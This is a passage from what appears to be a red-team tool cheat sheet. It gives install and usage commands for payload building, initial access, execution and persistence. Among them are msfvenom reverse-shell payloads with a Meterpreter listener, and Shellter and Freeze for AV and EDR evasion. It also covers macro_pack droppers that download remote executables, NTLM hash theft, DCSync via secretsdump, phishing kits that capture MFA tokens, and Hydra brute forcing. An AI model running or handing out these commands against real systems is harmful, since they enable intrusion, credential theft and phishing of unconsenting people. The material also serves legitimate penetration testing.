1009 | ### [🔙](#tool-list)[msfvenom](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/)
1010 |
1011 | Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.
1012 |
1013 | **Set Up Listener**
1014 |
1015 | ```shell
1016 | use exploit/multi/handler
1017 | set PAYLOAD windows/meterpreter/reverse_tcp
1018 | set LHOST your-ip
1019 | set LPORT listening-port
1020 | run
1021 | ```
1022 |
1023 | #### Msfvenom Commands
1024 |
1025 | **PHP:**
1026 |
1027 | ```bash
1028 | msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
1029 | ```
1030 |
1031 | **Windows:**
1032 |
1033 | ```bash
1034 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
1035 | ```
1036 |
1037 | **Linux:**
1038 |
1039 | ```bash
1040 | msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
1041 | ```
1042 |
1043 | **Java:**
1044 |
1045 | ```bash
1046 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
1047 | ```
1048 |
1049 | **HTA:**
1050 |
1051 | ```bash
1052 | msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
1053 | ```
1054 |
1055 | 
1056 |
1057 | ### [🔙](#tool-list)[Shellter](https://www.shellterproject.com/)
1058 |
1059 | Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
1060 |
1061 | It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).
1062 |
1063 | Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.
1064 |
1065 | Full README information can be found [here](https://www.shellterproject.com/Downloads/Shellter/Readme.txt).
1066 |
1067 | **Install: (Kali)**
1068 |
1069 | ```bash
1070 | apt-get update
1071 | apt-get install shellter
1072 | ```
1073 |
1074 | **Install: (Windows)**
1075 |
1076 | Visit the [download page](https://www.shellterproject.com/download/) and install.
1077 |
1078 | **Usage:**
1079 |
1080 | Just pick a legit binary to backdoor and run Shellter.
1081 |
1082 | Some nice tips can be found [here](https://www.shellterproject.com/tipstricks/).
1083 |
1084 | Lots of community usage demos can be found [here](https://www.shellterproject.com/shellter-community-demos/).
1085 |
1086 | 
1087 |
1088 | *Image used from https://www.kali.org/tools/shellter/images/shellter.png*
1089 |
1090 | ### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)
1091 |
1092 | Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.
1093 |
1094 | Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.
1095 |
1096 | **Install:**
1097 |
1098 | ```bash
1099 | git clone https://github.com/optiv/Freeze
1100 | cd Freeze
1101 | go build Freeze.go
1102 | ```
1103 |
1104 | **Usage:**
1105 |
1106 | ```
1107 | -I string
1108 | Path to the raw 64-bit shellcode.
1109 | -O string
1110 | Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
1111 | -console
1112 | Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
1113 | -encrypt
1114 | Encrypts the shellcode using AES 256 encryption
1115 | -export string
1116 | For DLL Loaders Only - Specify a specific Export function for a loader to have.
1117 | -process string
1118 | The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
1119 | -sandbox
1120 | Enables sandbox evasion by checking:
1121 | Is Endpoint joined to a domain?
1122 | Does the Endpoint have more than 2 CPUs?
1123 | Does the Endpoint have more than 4 gigs of RAM?
1124 | -sha256
1125 | Provides the SHA256 value of the loaders (This is useful for tracking)
1126 | ```
1127 |
1128 | 
1129 |
1130 | *Image used from https://www.blackhatethicalhacking.com/tools/freeze/*
1131 |
1132 | ### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)
1133 |
1134 | This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.
1135 |
1136 | Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.
1137 |
1138 | **Install:**
1139 |
1140 | ```
1141 | git clone https://github.com/0x09AL/WordSteal
1142 | cd WordSteal
1143 | ```
1144 |
1145 | **Usage:**
1146 |
1147 | ```bash
1148 | # Generate document containing 'test.jpg' and start listener
1149 | ./main.py 127.0.0.1 test.jpg 1
1150 |
1151 | # Generate document containing 'test.jpg' and do not start listener
1152 | ./main.py 127.0.0.1 test.jpg 0\n
1153 | ```
1154 |
1155 | 
1156 |
1157 | *Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*
1158 |
1159 | ### [🔙](#tool-list)WSH
1160 |
1161 | **Creating payload:**
1162 |
1163 | ```vbs
1164 | Set shell = WScript.CreateObject("Wscript.Shell")
1165 | shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
1166 | ```
1167 |
1168 | **Execute:**
1169 |
1170 | ```bash
1171 | wscript payload.vbs
1172 | cscript.exe payload.vbs
1173 | wscript /e:VBScript payload.txt //If .vbs files are blacklisted
1174 | ```
1175 |
1176 | ### [🔙](#tool-list)HTA
1177 |
1178 | **Creating payload:**
1179 |
1180 | ```html
1181 |
1182 |
1183 |
1187 |
1188 |
1189 | ```
1190 |
1191 | **Execute:** Run file
1192 |
1193 | ### [🔙](#tool-list)VBA
1194 |
1195 | **Creating payload:**
1196 |
1197 | ```python
1198 | Sub calc()
1199 | Dim payload As String
1200 | payload = "calc.exe"
1201 | CreateObject("Wscript.Shell").Run payload,0
1202 | End Sub
1203 | ```
1204 |
1205 | **Execute:** Set function to Auto_Open() in macro enabled document
1206 |
1207 | Initial Access
1208 | ====================
1209 |
1210 | ### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)
1211 |
1212 | The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.
1213 |
1214 | [hackinglab: Bash Bunny – Guide](https://hackinglab.cz/en/blog/bash-bunny-guide/)
1215 |
1216 | [Hak5 Documentation](https://docs.hak5.org/bash-bunny/)
1217 |
1218 | [Nice Payload Repo](https://github.com/hak5/bashbunny-payloads)
1219 |
1220 | [Product Page](https://hak5.org/products/bash-bunny)
1221 |
1222 | 
1223 |
1224 | ### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)
1225 |
1226 | evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
1227 |
1228 | **Install:**
1229 |
1230 | ```bash
1231 | git clone https://github.com/fin3ss3g0d/evilgophish
1232 | ```
1233 |
1234 | **Usage:**
1235 |
1236 | ```
1237 | Usage:
1238 | ./setup
1239 | - root domain - the root domain to be used for the campaign
1240 | - subdomains - a space separated list of evilginx2 subdomains, can be one if only one
1241 | - root domain bool - true or false to proxy root domain to evilginx2
1242 | - redirect url - URL to redirect unauthorized Apache requests
1243 | - feed bool - true or false if you plan to use the live feed
1244 | - rid replacement - replace the gophish default "rid" in phishing URLs with this value
1245 | - blacklist bool - true or false to use Apache blacklist
1246 | Example:
1247 | ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
1248 | ```
1249 |
1250 | 
1251 |
1252 | ### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)
1253 |
1254 | This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.
1255 |
1256 | **Install:**
1257 |
1258 | ```bash
1259 | git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
1260 | ```
1261 |
1262 | **Usage:**
1263 |
1264 | ```bash
1265 | python3 setoolkit
1266 | ```
1267 |
1268 | 
1269 |
1270 | ### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)
1271 |
1272 | Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.
1273 |
1274 | **Install:**
1275 |
1276 | ```bash
1277 | sudo apt install hydra
1278 | ```
1279 |
1280 | **Usage:**
1281 |
1282 | ```bash
1283 | hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error"
1284 | hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh
1285 | ```
1286 |
1287 | 
1288 |
1289 | ### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)
1290 |
1291 | SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See [PhishInSuits](https://github.com/secureworks/PhishInSuits) for more about OAuth Device Code flow for phishing attacks).
1292 |
1293 | Attack Steps:
1294 |
1295 | - Send malicious QR code to victim
1296 | - Victim scans QR code with mobile device
1297 | - Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
1298 | - Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
1299 | - Attacker polls for authentication
1300 | - Victim enters code into legit Microsoft website
1301 | - Attacker saves authentication token
1302 |
1303 | **Install:**
1304 |
1305 | ```bash
1306 | git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
1307 | ```
1308 |
1309 | **Note:** *Before using either module, update the required information in the settings.config file noted with `Required`.*
1310 |
1311 | **Usage (Email Module):**
1312 |
1313 | ```
1314 | usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
1315 |
1316 | optional arguments:
1317 | -h, --help show this help message and exit
1318 |
1319 | -c CONFIG, --config CONFIG
1320 | squarephish config file [Default: settings.config]
1321 |
1322 | --debug enable server debugging
1323 |
1324 | -e EMAIL, --email EMAIL
1325 | victim email address to send initial QR code email to
1326 | ```
1327 |
1328 | **Usage (Server Module):**
1329 |
1330 | ```
1331 | usage: squish.py server [-h] [-c CONFIG] [--debug]
1332 |
1333 | optional arguments:
1334 | -h, --help show this help message and exit
1335 |
1336 | -c CONFIG, --config CONFIG
1337 | squarephish config file [Default: settings.config]
1338 |
1339 | --debug enable server debugging
1340 | ```
1341 |
1342 | 
1343 |
1344 |
1345 | ### [🔙](#tool-list)[King Phisher](https://github.com/securestate/king-phisher)
1346 |
1347 | King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.
1348 |
1349 | It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.
1350 |
1351 | **Install (Linux - Client & Server):**
1352 |
1353 | ```bash
1354 | wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
1355 | sudo bash ./install.sh
1356 | ```
1357 |
1358 | **Usage:**
1359 |
1360 | Once King Phisher has been installed please follow the [wiki page](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) to setup SSH, Database config, SMTP server etc.
1361 |
1362 | 
1363 |
1364 | Execution
1365 | ====================
1366 |
1367 | ### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)
1368 |
1369 | Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.
1370 |
1371 | The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network.
1372 |
1373 | Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.
1374 |
1375 | **Install:**
1376 |
1377 | ```bash
1378 | git clone https://github.com/SpiderLabs/Responder#usage
1379 | cd Responder
1380 | ```
1381 |
1382 | **Usage:**
1383 |
1384 | ```bash
1385 | # Running the tool
1386 | ./Responder.py [options]
1387 |
1388 | # Typical usage
1389 | ./Responder.py -I eth0 -wrf
1390 | ```
1391 |
1392 | Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage).
1393 |
1394 | 
1395 |
1396 | *Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*
1397 |
1398 | ### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
1399 |
1400 | A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.
1401 |
1402 | It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:
1403 |
1404 | - Password hashes for local accounts
1405 | - Kerberos tickets and keys
1406 | - LSA Secrets
1407 |
1408 | **Install:**
1409 |
1410 | ```bash
1411 | python3 -m pip install impacket
1412 | ```
1413 |
1414 | **Usage:**
1415 |
1416 | ```bash
1417 | # Extract NTLM hashes with local files
1418 | secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
1419 |
1420 | # DCSync attack and dump the NTLM hashes of all domain users.
1421 | secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
1422 | ```
1423 |
1424 | 
1425 |
1426 | *Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*
1427 |
1428 | ### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)
1429 |
1430 | Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: *A service that allows administrators to remotely execute commands on a Windows machine*).
1431 |
1432 | Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.
1433 |
1434 | Some features include:
1435 |
1436 | - Loading in memory Powershell scripts
1437 | - Loading in memory dll files bypassing some AVs
1438 | - Loading x64 payloads
1439 | - Pass-the-hash support
1440 | - Uploading and downloading local and remote files
1441 |
1442 |
1443 | **Install: (Git)**
1444 |
1445 | ```bash
1446 | sudo gem install winrm winrm-fs stringio logger fileutils
1447 | git clone https://github.com/Hackplayers/evil-winrm.git
1448 | cd evil-winrm
1449 | ```
1450 |
1451 | **Install: (Ruby gem)**
1452 |
1453 | ```bash
1454 | gem install evil-winrm
1455 | ```
1456 |
1457 | Alternative installation instructions can be found [here](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).
1458 |
1459 | **Usage:**
1460 |
1461 | ```bash
1462 | # Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
1463 | evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
1464 |
1465 | # Upload local files to victim
1466 | upload local_filename
1467 | upload local_filename destination_filename
1468 |
1469 | # Download remote files to local machine
1470 | download remote_filename
1471 | download remote_filename destination_filename
1472 |
1473 | # Execute .Net assembly into victim memory
1474 | Invoke-Binary /opt/csharp/Rubeus.exe
1475 |
1476 | # Load DLL library into victim memory
1477 | Dll-Loader -http http://10.10.10.10/SharpSploit.dll
1478 | ```
1479 |
1480 | Full usage documentation can be found [here](https://github.com/Hackplayers/evil-winrm#documentation).
1481 |
1482 | 
1483 |
1484 | *Image used from https://korbinian-spielvogel.de/posts/heist-writeup/*
1485 |
1486 | ### [🔙](#tool-list)[Donut](https://github.com/TheWover/donut/)
1487 |
1488 | A tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk.
1489 |
1490 | **Install: (Windows)**
1491 |
1492 | ```bash
1493 | git clone http://github.com/thewover/donut.git
1494 | ```
1495 |
1496 | To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:
1497 |
1498 | ```bash
1499 | nmake -f Makefile.msvc
1500 | ```
1501 |
1502 | To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:
1503 |
1504 | ```bash
1505 | make -f Makefile.mingw
1506 | ```
1507 |
1508 | **Install: (Linux)**
1509 |
1510 | ```bash
1511 | pip3 install donut-shellcode
1512 | ```
1513 |
1514 | **Usage:**
1515 |
1516 | ```bash
1517 | # Creating shellcode from an XSL file that pops up a calculator.
1518 | shellcode = donut.create(file=r"C:\\Tools\\Source\\Repos\\donut\\calc.xsl")
1519 |
1520 | # Creating shellcode from an unmanaged DLL. Invokes DLLMain.
1521 | shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
1522 | ```
1523 |
1524 | For full usage information, see the donut [GitHub Page](https://github.com/TheWover/donut/#4-usage).
1525 |
1526 | See [a recent blog post](https://thewover.github.io/Bear-Claw/) from The Wover for more info.
1527 |
1528 | 
1529 |
1530 | ### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)
1531 |
1532 | A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.
1533 |
1534 | **Install: (Binary)**
1535 |
1536 | 1. Get the latest binary from [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
1537 | 2. Download binary on PC with genuine Microsoft Office installed.
1538 | 3. Open console, CD to binary dir and call the binary
1539 |
1540 | **Install: (Git)**
1541 |
1542 | ```bash
1543 | git clone https://github.com/sevagas/macro_pack.git
1544 | cd macro_pack
1545 | pip3 install -r requirements.txt
1546 | ```
1547 |
1548 | **Usage:**
1549 |
1550 | ```bash
1551 | # Help Page
1552 | python3 macro_pack.py --help
1553 |
1554 | # List all supported file formats
1555 | macro_pack.exe --listformats
1556 |
1557 | # Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.
1558 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
1559 |
1560 | # Obfuscate Empire stager VBA file and generate a MS Word document:
1561 | macro_pack.exe -f empire.vba -o -G myDoc.docm
1562 |
1563 | # Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
1564 | echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
1565 |
1566 | # Execute calc.exe via Dynamic Data Exchange (DDE) attack
1567 | echo calc.exe | macro_pack.exe --dde -G calc.xslx
1568 | ```
1569 |
1570 | 
1571 |
1572 | ### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
1573 |
1574 | A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.
1575 |
1576 | Some of the features of PowerSploit:
1577 |
1578 | - Dump password hashes and extract clear-text passwords from memory
1579 | - Escalate privileges and bypass security controls
1580 | - Execute arbitrary PowerShell code and bypass execution restrictions
1581 | - Perform network reconnaissance and discovery
1582 | - Generate payloads and execute exploits
1583 |
1584 | **Install:** *1. Save to PowerShell modules folder*
1585 |
1586 | First you will need to download the [PowerSploit Folder](https://github.com/PowerShellMafia/PowerSploit) and save it to your PowerShell modules folder.
1587 |
1588 | Your PowerShell modules folder path can be found with the following command:
1589 |
1590 | ```
1591 | $Env:PSModulePath
1592 | ```
1593 |
1594 | **Install:** *2. Install PowerSploit as a PowerShell module*
1595 |
1596 | You will then need to install the PowerSploit module (use the name of the downloaded folder).
1597 |
1598 | **Note:** *Your PowerShell execution policy might block you, to fix this run the following command.*
1599 |
1600 | ```
1601 | powershell.exe -ep bypass
1602 | ```
1603 |
1604 | Now you can install the PowerSploit module.
1605 |
1606 | ```
1607 | Import-Module PowerSploit
1608 | ```
1609 |
1610 | **Usage:**
1611 |
1612 | ```
1613 | Get-Command -Module PowerSploit
1614 | ```
1615 |
1616 | 
1617 |
1618 | ### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)
1619 |
1620 | A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.
1621 |
1622 | Some of the features of Rubeus:
1623 |
1624 | - Kerberoasting
1625 | - Golden ticket attacks
1626 | - Silver ticket attacks
1627 |
1628 | **Install: (Download)**
1629 |
1630 | You can install the unofficial pre-compiled Rubeus binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).
1631 |
1632 | **Install: (Compile)**
1633 |
1634 | Rubeus is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the rubeus [project .sln](https://github.com/GhostPack/Rubeus), choose "Release", and build.
1635 |
1636 | **Usage:**
1637 |
1638 | ```
1639 | Rubeus.exe -h
1640 | ```
1641 |
1642 | 
1643 |
1644 |
1645 | ### [🔙](#tool-list)[SharpUp](https://github.com/GhostPack/SharpUp)
1646 |
1647 | A nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc.
1648 |
1649 | **Install: (Download)**
1650 |
1651 | You can install the unofficial pre-compiled SharpUp binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe).
1652 |
1653 | **Install: (Compile)**
1654 |
1655 | SharpUp is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409). Open the SharpUp [project .sln](https://github.com/GhostPack/SharpUp), choose "Release", and build.
1656 |
1657 | **Usage:**
1658 |
1659 | ```bash
1660 | SharpUp.exe audit
1661 | #-> Runs all vulnerability checks regardless of integrity level or group membership.
1662 |
1663 | SharpUp.exe HijackablePaths
1664 | #-> Check only if there are modifiable paths in the user's %PATH% variable.
1665 |
1666 | SharpUp.exe audit HijackablePaths
1667 | #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.
1668 | ```
1669 |
1670 | 
1671 |
1672 | ### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)
1673 |
1674 | MS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.
1675 |
1676 | This C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the [wiki](https://github.com/skahwah/SQLRecon/wiki).
1677 |
1678 | **Install: (Binary)**
1679 |
1680 | You can download the latest binary release from [here](https://github.com/skahwah/SQLRecon/releases).
1681 |
1682 | **Usage:**
1683 |
1684 | ```bash
1685 | # Authenticating using Windows credentials
1686 | SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
1687 |
1688 | # Authenticating using Local credentials
1689 | SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami
1690 |
1691 | # Authenticating using Azure AD credentials
1692 | SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami
1693 |
1694 | # Run whoami
1695 | SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
1696 |
1697 | # View databases
1698 | SQLRecon.exe -a Windows -s SQL01 -d master -m databases
1699 |
1700 | # View tables
1701 | SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019
1702 | ```
1703 |
1704 | Full usage information can be found on the [wiki](https://github.com/skahwah/SQLRecon/wiki).
1705 |
1706 | Tool module usage information can be found [here](https://github.com/skahwah/SQLRecon#usage).
1707 |
1708 | 
1709 |
1710 | *Image used from SQLRecon help page*
1711 |
1712 | ### [🔙](#tool-list)[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList)
1713 |
1714 | This resrouce is a collection of the most common and known techniques to bypass AppLocker.
1715 |
1716 | Since AppLocker can be configured in different ways [@api0cradle](https://github.com/api0cradle) maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone.
1717 |
1718 | They also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.
1719 |
1720 | Indexed Lists
1721 |
1722 | - [Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md)
1723 | - [VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md)
1724 | - [UnverifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md)
1725 | - [DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md)
1726 |
1727 | 
1728 |
1729 | *Image used from https://github.com/api0cradle/UltimateAppLockerByPassList*
1730 |
1731 | ### [🔙](#tool-list)[StarFighters](https://github.com/Cn33liz/StarFighters)
1732 |
1733 | A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.
1734 |
1735 | Both Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe.
1736 |
1737 | This might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.
1738 |
1739 | **Usage:**
1740 |
1741 | - Setup a new Listener within PowerShell Empire
1742 | - Use the Launcher command to Generate a PowerShell launcher for this listener
1743 | - Copy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file
1744 |
1745 | For the JavaScript version use the following Variable:
1746 |
1747 | ```javascript
1748 | var EncodedPayload = ""
1749 | ```
1750 |
1751 | For the VBScript version use the following Variable:
1752 |
1753 | ```vbscript
1754 | Dim EncodedPayload: EncodedPayload = ""
1755 | ```
1756 |
1757 | - Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.
1758 |
1759 | 
1760 |
1761 | *Image used from https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html*
1762 |
1763 | ### [🔙](#tool-list)[demiguise](https://github.com/nccgroup/demiguise)
1764 |
1765 | The aim of this project is to generate .html files that contain an encrypted HTA file.
1766 |
1767 | The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user.
1768 |
1769 | This is an evasion technique to get round content / file-type inspection implemented by some security-appliances.
1770 |
1771 | Further technical information [here](https://github.com/nccgroup/demiguise#how-does-it-do-it).
1772 |
1773 | **Install:**
1774 |
1775 | ```
1776 | git clone https://github.com/nccgroup/demiguise
1777 | cd demiguise
1778 | ```
1779 |
1780 | **Usage:**
1781 |
1782 | ```bash
1783 | # Generate an encrypted .hta file that executes notepad.exe
1784 | python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta
1785 | ```
1786 |
1787 | 
1788 |
1789 | *Image used from https://github.com/nccgroup/demiguise*
1790 |
1791 | Persistence
1792 | ====================
1793 |
1794 | ### [🔙](#tool-list)[Impacket](https://github.com/fortra/impacket)
1795 |
1796 | Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.
1797 |
1798 | It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.
1799 |
1800 | **Install:**
1801 |
1802 | ```bash
1803 | python3 -m pip install impacket
1804 | ```
1805 |
1806 | **Install: (With Example Scripts)**
1807 |
1808 | Download and extract [the package](https://github.com/fortra/impacket), then navigate to the install folder and run...
1809 |
1810 | ```bash
1811 | python3 -m pip install .
1812 | ```
1813 |
1814 | **Usage:**
1815 |
1816 | ```bash
1817 | # Extract NTLM hashes with local files
1818 | secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
1819 |
1820 | # Gets a list of the sessions opened at the remote hosts
1821 | netview.py domain/user:password -target 192.168.10.2
1822 |
1823 | # Retrieves the MSSQL instances names from the target host.
1824 | mssqlinstance.py 192.168.1.2
1825 |
1826 | # This script will gather data about the domain's users and their corresponding email addresses.
1827 | GetADUsers.py domain/user:password@IP
1828 | ```
1829 |
1830 | Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) for Impacket usage.
1831 |
1832 | 
1833 |
1834 | ### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)
1835 |
1836 | Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.
1837 |
1838 | Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.
1839 |
1840 | Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.
1841 |
1842 | **Install:**
1843 |
1844 | ```bash
1845 | git clone https://github.com/EmpireProject/Empire
1846 | cd Empire
1847 | sudo ./setup/install.sh
1848 | ```
1849 |
1850 | **Usage:**
1851 |
1852 | ```bash
1853 | # Start Empire
1854 | ./empire
1855 |
1856 | # List live agents
1857 | list agents
1858 |
1859 | # List live listeners
1860 | list listeners
1861 | ```
1862 |
1863 | Nice usage [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) by [HarmJoy](https://github.com/HarmJ0y).
1864 |
1865 | 
1866 |
1867 | ### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)
1868 |
1869 | A Windows persistence toolkit written in C#.
1870 |
1871 | The project has a [wiki](https://github.com/mandiant/SharPersist/wiki).
1872 |
1873 | **Install: (Binary)**
1874 |
1875 | You can find the most recent release [here](https://github.com/mandiant/SharPersist/releases).
1876 |
1877 | **Install: (Compile)**
1878 |
1879 | - Download the project files from the [GitHub Repo](https://github.com/mandiant/SharPersist).
1880 | - Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
